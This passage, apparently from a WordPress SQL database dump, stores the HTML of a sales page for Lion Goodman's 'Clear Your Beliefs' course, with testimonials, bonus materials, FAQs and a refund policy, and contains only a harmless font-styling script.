below.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>. She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world. Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\r\n\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>"I uncovered beliefs I didn''t know I had, including: “<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God.”</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\r\n<div style="text-align: right;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\r\n<div class="module_body">\r\n\r\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\r\n<ul style="padding-left: 20px;">\r\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\r\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\r\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\r\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\r\n	<li>Learn a process that can strengthen your power of intention</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“This valuable tool will enhance your life in ways you cannot imagine. It’s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding.”</em>\r\n<div style="text-align: right;"><strong><strong>~ C.T., Performance and Life Coach</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Transform Your Beliefs eBook</strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg"><img class=" wp-image-433 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg" alt="TYB Cover" width="159" height="206" /></a>\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nYou’ll also receive a copy of Lion’s multimedia eBook, “<em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em>.” Lion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why we do what we do, and why it’s so difficult to change our habitual patterns of thought and behavior. It’s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them.”</em>\r\n<div style="text-align: right;"><strong><strong>– M.M., International Business Consultant</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\r\n\r\n</div>\r\n</div>\r\n&nbsp;\r\n<div class="icon_box" style="width: 760px; margin: 17px 0 17px -70px;">\r\n<h1>Register Today And You’ll Receive:</h1>\r\n<strong>Seven 90-Minute Class Sessions</strong> – This is a rare opportunity to learn from the creator of one of the world’s most powerful belief-change technologies, and from the comfort of your own home. Each class session helps you learn specific skills to change your beliefs – easily, anytime – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. The audio recordings are available for you to listen online, or you can download them in high-quality MP3 format and listen to them anytime and anywhere on your audio player.\r\n\r\n<strong>Nine PDF Transcripts – </strong>In addition to the high quality MP3 audios, you’ll also receive the entire class transcribed word-for-word in PDF format. This includes seven classes plus two bonus calls. You can review, print and highlight the most important insights and practices.\r\n<h1>Plus: <em>The Entire BONUS Collection:</em></h1>\r\n<ul>\r\n	<li><strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.</li>\r\n	<li><em>T<strong>he Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.</li>\r\n	<li>Your Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong></li>\r\n	<li><strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)</li>\r\n	<li>Multimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)</li>\r\n</ul>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Take This Opportunity For Deep Learning And Transformation</h1>\r\nThis is an opportunity to learn <em>and practice</em> shifting your life – from the core of your psyche. You’ll have a direct experience of the power of <em>The BeliefCloset Process</em>, and you''ll see for yourself how easy it is to significantly change your life.\r\n\r\nYou''ll become part of a global community of like-minded and love-hearted people who dive deeply into themselves to transform the world from the inside out.\r\n\r\nYou can take this journey on your own, one recorded session at a time, or you can sign up for support from a <em>Clear Your Beliefs Coach</em>, a trained professional who will accompany you and guide you through the process. Our coaches are highly trained and qualified to help you deal with any issue you have, in any part of your life, regardless of how long it’s been interfering with your success, joy, and freedom.\r\n<h6>[Note that <em>Clear Your Beliefs Coaches</em> are trained to help you change your own beliefs and remove the impact they have had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</h6>\r\nIn addition to being personally guided by Lion Goodman, you’ll save time and money on the cost of attending a workshop or coaching in person. (Fees, travel, meals and accommodations would add up to thousands of dollars). From the comfort of your home, you’ll go through the program at your own pace.\r\n\r\nIf you’re serious about bringing more freedom, success and joy into your life, you owe it to yourself, your loved ones, and our world – to take this one-of-a-kind training. Transform your life by transforming your beliefs!\r\n\r\nIf you’re ready to clear your old beliefs, click the register button below to choose the method best suited to you.\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Are You A Change Agent? Join the Global Community of BeliefCloset Practitioners</h1>\r\nAfter you complete the course, you’ll be given an opportunity to register for the <strong>BeliefCloset Practitioner Training.</strong>\r\n\r\n<img class=" wp-image-249 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/global1-300x203.jpg" alt="global" width="191" height="129" />In this 10-week course, you’ll learn how to professionally guide others through the BeliefCloset Process.\r\n\r\nJoin our worldwide community of change agents – including therapists, coaches, and healers of all types. We help our clients, friends, and family members transform their lives by clearing their beliefs at the core of the psyche.\r\n\r\n&nbsp;\r\n<h1>About Lion Goodman</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\r\n\r\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World.</em>\r\n\r\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\r\n\r\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men’s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men’s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\r\n\r\n&nbsp;\r\n<h1 class="center">Satisfaction Guaranteed</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, led by Lion Goodman, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. And just for trying it out, you can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program and unused coaching hours.)\r\n\r\n&nbsp;\r\n<div class="s20"></div>\r\n<h1 id="faq">Frequently Asked Questions</h1>\r\n&nbsp;\r\n\r\n<strong>Q: What is a virtual course?</strong>\r\n\r\nA: It’s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you’ll work by phone or Skype at a time that’s most convenient to you.\r\n\r\nIn addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: How long will I have access to the course?</strong>\r\n\r\nA: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you’ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: Are there scholarships available?</strong>\r\n\r\nA: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to info@clearyourbeliefs.com, with a description of your circumstances and your offer of what you can pay.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: What is your refund policy?</strong>\r\n\r\nA: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: How can I reach Customer Support?</strong>\r\n\r\nA: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We’ll get back to you within 48 hours (sometimes longer over weekends).\r\n\r\n&nbsp;\r\n\r\n<strong> Q: What is your Privacy Policy?</strong>\r\n\r\nA: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from ClearYourBeliefs.com, BeliefCloset.com, or ConfusedAboutLove.com.\r\n\r\nYou may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.\r\n\r\nAll information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.\r\n\r\n<script>\r\njQuery(document).ready(function() { \r\nvar is_chrome = window.chrome; \r\n if (is_chrome) { \r\njQuery(''h5.hdr'').css(''font'',''51px/75px ''Arial Narrow'', Arial, sans-serif!important'');\r\n jQuery(''h5.hdr'').animate({\r\n    fontSize: ''51px''\r\n }, 100);\r\n } \r\n});\r\n</script>', 'Clear Your Beliefs', '', 'inherit', 'closed', 'open', '', '915-revision-v1', '', '', '2014-06-17 21:54:04', '2014-06-18 02:54:04', '', 915, 'http://clearyourbeliefs.com/915-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(1009, 4194, '2014-06-17 21:55:50', '2014-06-18 02:55:50', '<div style="width: 115%; margin-left: -40px;">\r\n\r\n<img class="hdr-img alignleft wp-image-300" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/header-img2.jpg" alt="header-img" width="160" height="147" />\r\n<h5 class="hdr rt"><strong>Delete Blocks &amp; Limitations</strong></h5>\r\n<img class="wp-image-302 alignright tophdr" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/joy1-300x282.jpg" alt="joy" width="160" height="150" />\r\n<h5 class="hdr lt"><strong>Allow More Success &amp; Joy</strong></h5>\r\n<img class="tophdr alignleft wp-image-316" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/simply-300x300.jpg" alt="simply" width="159" height="159" />\r\n<h5 class="hdr rt"><strong>Simply CLEAR Your Beliefs!</strong></h5>\r\n</div>\r\n<div class="quot" style="float: left; margin-top: 0px; margin-left: 40px; text-align: center;"><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\r\nWhen you learn to change your beliefs, limitations disappear,\r\nand possibilities become unlimited.</strong></span>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>\r\n&nbsp;\r\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.\r\n\r\nYet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.\r\n\r\n&nbsp;\r\n<h1>What If You Could Permanently Delete Old Habits And Patterns So They <em>Didn''t</em> Come Back?</h1>\r\nHundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.\r\n\r\n<strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\r\n\r\n&nbsp;\r\n<h1>Why Does This Happen?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes <span style="text-decoration: underline;">much</span> more time and practice.\r\n\r\nNeuroscientists call the brain’s ability to change over time "neuroplasticity."\r\n\r\nIt can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong>\r\n\r\n&nbsp;\r\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\r\n<span style="color: #000000;">The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></span>\r\n\r\nIf you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\r\nYour psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a><span style="color: #000080;">Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</span>\r\n\r\n<span style="color: #000000;"><strong>We literally <span style="text-decoration: underline;">create our reality</span> with our beliefs.</strong></span>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.\r\n\r\n&nbsp;\r\n<h1>Upgrade Your Human Operating System</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.\r\n\r\nNegative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong>\r\n<div class="icon_box bullets">\r\n<ul class="two-col">\r\n	<li><strong><em>I''m not enough.</em></strong></li>\r\n	<li><strong><em>I can''t do it.</em></strong></li>\r\n	<li><strong><em>I''m not worthy.</em></strong></li>\r\n	<li><strong><strong><em>I''ll never be like them.</em></strong></strong></li>\r\n	<li><strong><em>I''m all alone.</em></strong></li>\r\n</ul>\r\n<ul class="two-col rt">\r\n	<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\r\n	<li><strong><em>There''s something wrong with me.</em></strong></li>\r\n	<li><strong><em>I''m fundamentally flawed.</em></strong></li>\r\n	<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\r\n	<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\r\n</ul>\r\n</div>\r\nThese beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.\r\n\r\nAt the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.\r\n\r\n<strong>Here''s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong>\r\n\r\n&nbsp;\r\n<h1>The Garden Of Your Mind</h1>\r\n<p style="text-align: left;"><span style="color: #800000;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> </span>When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\r\n<p style="text-align: left;">The same thing is true in your subconscious mind:</p>\r\n<span style="color: #333399;"><strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong></span>\r\n<p style="text-align: left;"><strong>It''s that simple.</strong></p>\r\n&nbsp;\r\n<h1>Beliefs Reside In The Subconscious Mind</h1>\r\n<p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\r\n<p style="text-align: left;">To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\r\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong>\r\n\r\n<img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />A shift at the core of the psyche expands out like a pebble’s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong>\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\r\n<strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.\r\n\r\n<em><strong>How you view others </strong></em>is colored by your beliefs about them.\r\n\r\n<strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.\r\n\r\n<img class=" wp-image-322 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" />Change the lens of your beliefs, and you’ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong>\r\n\r\n<strong> <span style="color: #000080;">It’s that simple.</span></strong>\r\n\r\n&nbsp;\r\n<h1>Why Beliefs Are Difficult To Change</h1>\r\nMany people agree that, <em>“Your beliefs create your reality,” </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There’s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.\r\n\r\n<strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.\r\n\r\nYour parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn’t know any better. it’s exactly what <em>their parents</em> did to<em> them</em>.\r\n\r\nYou formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."\r\n\r\n&nbsp;\r\n<h1>Why We React The Way We Do</h1>\r\nWhen you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:\r\n\r\n<img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" />\r\n<ul class="indented-img-left">\r\n	<li>Why did I say that?</li>\r\n	<li>What’s wrong with me?</li>\r\n	<li>Why didn’t I follow through?</li>\r\n	<li>Why did I react that way?</li>\r\n	<li>What the hell just happened?</li>\r\n</ul>\r\n<em>\r\n"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.\r\n\r\nThese programs are like mousetraps in your mind’s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.\r\n\r\n<strong>You can change these reactive patterns – if you’re willing to clean out your basement.</strong>\r\n\r\n&nbsp;\r\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\r\n<strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. <strong>Here''s why:</strong>\r\n<ul class="indented">\r\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don’t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\r\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn’t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\r\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\r\n</ul>\r\nMost belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn’t you! The problem is with the method – it was only partially effective!</strong>\r\n\r\n&nbsp;\r\n<h1>Here’s Some Good News</h1>\r\n<ul class="indented">\r\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It’s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\r\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\r\n</ul>\r\nTo get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they’ll pop up later and create the same problem – again and again.\r\n\r\nYou can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.\r\n\r\n&nbsp;\r\n<h1>Imagine The Life You Desire</h1>\r\n<strong>Can you imagine this?</strong>\r\n\r\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\r\n<ul class="indented-img-left">\r\n	<li>You''re no longer held back by old beliefs and stories.</li>\r\n	<li>There''s no resistance to doing what needs to be done.</li>\r\n	<li>You feel joy and positive energy as you move forward to create the life of your dreams.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\r\n<strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong>\r\n\r\n<img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em>\r\n\r\nThose discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.\r\n\r\n<em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never 